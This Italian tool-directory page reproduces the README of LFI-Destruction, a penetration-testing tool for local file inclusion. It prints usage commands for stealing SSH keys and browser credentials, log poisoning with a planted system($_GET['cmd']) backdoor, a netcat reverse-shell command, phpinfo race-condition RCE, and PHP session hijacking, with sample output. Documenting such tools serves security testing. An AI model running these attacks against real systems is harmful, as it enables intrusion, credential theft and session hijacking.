Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
LFI-Destruction — Questo programma ti chiede le informazioni per il Local File Inclusion e cercherà automaticamente il file /etc/passwd; utilizzando i nomi utente trovati, cercherà e scaricherà qualsiasi chiave SSH o variazione di chiavi sul computer locale. Questo programma esegue anche l'exploit di traversal path CVE-2021-41773 per Apache 2.4.49 e 2.4.50. In aggiunta ad altre vulnerabilità LFI. | Kitploit
Strumenti/GitHubGitHub/revshellxd/lfi-destruction
Escalation di PrivilegiRicognizioneAttacchi alle PasswordGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniCTF

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Penetration Testing
Apprendimento e Formazione
GitHubrevshellxd/lfi-destruction

LFI-Destruction

Vedi Repository
46 mesi faNon ancora revisionato

Informazioni

Questo programma ti chiede le informazioni per il Local File Inclusion e cercherà automaticamente il file /etc/passwd; utilizzando i nomi utente trovati, cercherà e scaricherà qualsiasi chiave SSH o variazione di chiavi sul computer locale. Questo programma esegue anche l'exploit di traversal path CVE-2021-41773 per Apache 2.4.49 e 2.4.50. In aggiunta ad altre vulnerabilità LFI.

Condividi

🔥 LFI-Destruction – Framework per Penetration Testing Autorizzato LFI-Destroyer è un framework completo e modulare per lo sfruttamento di Local File Inclusion (LFI) progettato per professionisti della sicurezza autorizzati. Combina molteplici tecniche di attacco in un unico strumento facile da usare:

  • SSH & Browser Artifact Fuzzing – Caccia alle chiavi SSH, Putty PPK, WinSCP, FileZilla, Firefox, Chrome, Edge e Brave su Linux e Windows.
  • Log Poisoning → Reverse Shell – RCE automatica tramite file di log scrivibili con supporto per payload personalizzati.
  • phpinfo() Race Condition RCE – LFI2RCE completamente automatizzata quando file_uploads=On e phpinfo() è accessibile.
  • Uploaded File Trigger – Includi ed esegui una shell PHP già caricata tramite LFI.
  • PHP Session Enumeration – Scarica e decodifica i file di sessione per il hijacking.

LFI-OSCP.py È la versione sicura per l'esame OSCP, con 0 exploit automatici. È sostanzialmente un fuzzer molto carino che, una volta confermato l'exploit, stampa istruzioni manuali su come eseguirlo.

⚠️ DISCLAIMER LEGALE Questo strumento è solo per scopi educativi e test di sicurezza autorizzati. Devi ottenere un permesso scritto esplicito dal proprietario del sistema prima di usarlo. L'accesso non autorizzato a sistemi informatici è illegale e non etico. L'autore declina ogni responsabilità per qualsiasi uso improprio o danno causato da questo strumento.

📦 Installazione

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/RevShellXD/LFI-Destroyer.git
cd LFI-Destroyer

# 2. Install dependencies (only colorama is required; others are optional)
pip install colorama

# 3. Make the main script executable
chmod +x LFI-Destroyer.py

🚀 Avvio Rapido – Modalità 1 (Fuzzing di artefatti SSH e browser)

root@kitploit:~
python3 LFI-Destroyer.py

Seleziona Linux o Windows.

📂 Struttura delle Directory

root@kitploit:~
LFI-Destruction/
LFI-Destruction.py          

modes/__init__.py ,mode3_phpinfo_race.py, mode4_upload_trigger.py, mode5_session_grabber.py           

artifacts/               

README.md

Scegli la modalità di attacco 1.

Segui i prompt per configurare il tuo endpoint LFI.

Lo script enumererà automaticamente gli utenti, verificherà l'esistenza (Windows usa il beacon NTUSER.DAT) e farà fuzzing ricorsivo per chiavi SSH, credenziali del browser e altri file sensibili.

Tutti gli artefatti vengono salvati nella directory ./artifacts/.

📝 Modalità 2 – Log Poisoning & Reverse Shell

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua

Oppure esegui in modo interattivo e seleziona la modalità 2.

Cosa succede:

  • Inietta un payload di test PHP tramite User-Agent (o il vettore scelto).
  • Prova a includere file di log comuni (Apache, Nginx, SSH, log di sistema, XAMPP/WAMP/IIS su Windows).
  • Se viene trovato un log scrivibile, inietta una backdoor persistente system($_GET['cmd']).
  • Conferma RCE con id (Linux) o whoami (Windows).
  • Richiede un listener per reverse shell e fornisce una reverse shell bash (Linux) o PowerShell (Windows).

Reverse shell personalizzata:

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua --custom-shell "nc {lhost} {lport} -e /bin/bash"

I placeholder {lhost} e {lport} verranno sostituiti con il tuo IP/porta del listener.

🧪 BETA – Modalità 3: phpinfo() Race Condition RCE Stato: Beta – Funziona in modo affidabile su server PHP mal configurati con file_uploads=On e phpinfo() accessibile.

Prerequisiti:

  • file_uploads = On (rilevato automaticamente)
  • post_max_size ≥ upload_max_filesize (rilevato automaticamente)
  • Vulnerabilità LFI
  • Accesso a una pagina phpinfo() (lo script forza brute nei percorsi comuni)

Esecuzione:

root@kitploit:~
python3 LFI-Destroyer.py
# Seleziona la modalità 3
Fornisci i dettagli LFI come al solito
Lo script:
  - Effettuerà brute force su phpinfo() (wordlist specifica per OS)
  - Analizzerà upload_max_filesize e post_max_size
  - Eseguirà l'attacco race condition (upload + LFI)
  - Confermerà RCE
  - Offrirà reverse shell

Esempio di output:

root@kitploit:~
[*] Bruteforcing phpinfo.php (45 paths) ...
[+] Found phpinfo.php at http://192.168.1.100/phpinfo.php
[+] file_uploads=On (max size: 8M)
[+] Attempt race condition RCE? (y/N): y
[*] Race attempt 1/3 ...
[+] Extracted temporary file path: /tmp/phpABC123
[+] RCE confirmed via temporary file!
[!] LOG POISONING SUCCESSFUL! Ready to escalate to reverse shell.

🧪 BETA – Modalità 4: Trigger su file caricato Stato: Beta – Presuppone che tu abbia già caricato una shell PHP (ad esempio tramite un'altra vulnerabilità o upload manuale). Lo script usa quindi LFI per includerla ed eseguire comandi.

Due modalità operative:

  • Percorso esatto – Sai dove si trova il file (es. uploads/shell.php).
  • Brute-force – Lascia che lo script provi directory di upload e nomi di file comuni.

Esecuzione:

root@kitploit:~
python3 LFI-Destroyer.py
# Seleziona la modalità 4
 Inserisci il percorso o 'brute'
 Lo script:
  - Proverà l'inclusione LFI con `?cmd=whoami`
  - Se ha successo, mostrerà l'output e offrirà una reverse shell

Esempio:

root@kitploit:~
Enter path to uploaded file (relative to web root), or 'brute' to try common locations: uploads/shell.php
[*] Trying uploads/shell.php ...
[+] SUCCESS! Shell executed at uploads/shell.php
[+] Command output:
www-data
Attempt reverse shell? (y/N): y

🧪 BETA – Modalità 5: Enumerazione e Hijacking delle Sessioni PHP Stato: Beta – Legge i file di sessione da session.save_path (determinato tramite phpinfo() o wordlist di fallback), li salva e tenta la decodifica base64 quando necessario.

Esecuzione:

root@kitploit:~
python3 LFI-Destroyer.py
# Seleziona la modalità 5
 Fornisci l'ID di sessione o 'list' per enumerare

Esempi:

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: abc123
[*] Reading /var/lib/php/sessions/sess_abc123 ...
[+] Session file retrieved!
[--- SESSION DATA (raw) ---]
username|s:5:"admin";user_id|i:1;

Elenca le sessioni (se l'indicizzazione delle directory è abilitata):

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: list
[+] Found 12 session files:
  - sess_abc123
  - sess_def456
  ...

Tutti i file di sessione vengono salvati in artifacts/session_*. Se i dati appaiono codificati in base64, lo script tenta automaticamente il bypass php://filter/convert.base64-decode e salva una versione decodificata.

🧠 Modalità Avanzata (-adv) Abilita tecniche LFI aggiuntive:

  • LFI tramite parametro POST
  • LFI tramite Cookie/Header
  • Wrapper PHP (php://filter, data://, expect://)
  • Wordlist personalizzata per fuzzing di artefatti
  • Rilevamento automatico della profondità
root@kitploit:~
python3 LFI-Destroyer.py -adv

⚙️ Flag da Riga di Comando

Le modalità 3, 4 e 5 vengono caricate dinamicamente dalla directory modes/. Puoi facilmente aggiungere nuove modalità inserendo un file Python con una funzione run(config, fuzzer).

🧰 Requisiti

  • Python 3.8+
  • colorama (opzionale, per output colorato)
  • Nessuna altra dipendenza – lo script utilizza solo la libreria standard.

📜 Licenza e Autore Scritto da RevShellXD Concesso in licenza MIT – gratuito per professionisti della sicurezza autorizzati. Solo per scopi educativi e test autorizzati. Se infrangi la legge con questo strumento, ne sei l'unico responsabile.

⭐ Stella e Contribuisci Se trovi utile questo strumento, ti preghiamo di mettere una stella al repository su GitHub. Pull request e contributi di nuove modalità sono benvenuti – segui la semplice interfaccia del modulo in modes/__init__.py.

Scarica lo strumento
FlagDescrizione
--os {linux,windows}Forza il sistema operativo di destinazione
--auto-depthRileva automaticamente la profondità di attraversamento
--wordlist FILEWordlist personalizzata per percorsi file (sostituisce i default del sistema operativo)
--userlist FILENomi utente Windows personalizzati (modalità 1)
--beacon-file PATHFile beacon personalizzato (default: NTUSER.DAT)
--custom-shell CMDComando reverse shell personalizzato (usa {lhost} e {lport})
--log-poisoningAbilita modalità 2 da riga di comando (nessuna selezione interattiva)
--log-vector {ua,referer,xff,header,param}Vettore di iniezione per log poisoning
--log-header NAMENome header personalizzato (per vector=header)
--log-param NAMENome parametro personalizzato (per vector=param)
--log-files FILEElenco personalizzato di percorsi log
--rce-command CMDComando di test per verifica RCE
--proxy URLProxy HTTP (es. http://127.0.0.1:8080)
--rate FLOATRitardo tra le richieste (secondi)
--output FILESalva risultati in JSON
--dry-runConfigurazione di test – nessuna richiesta inviata
--no-colorDisabilita output colorato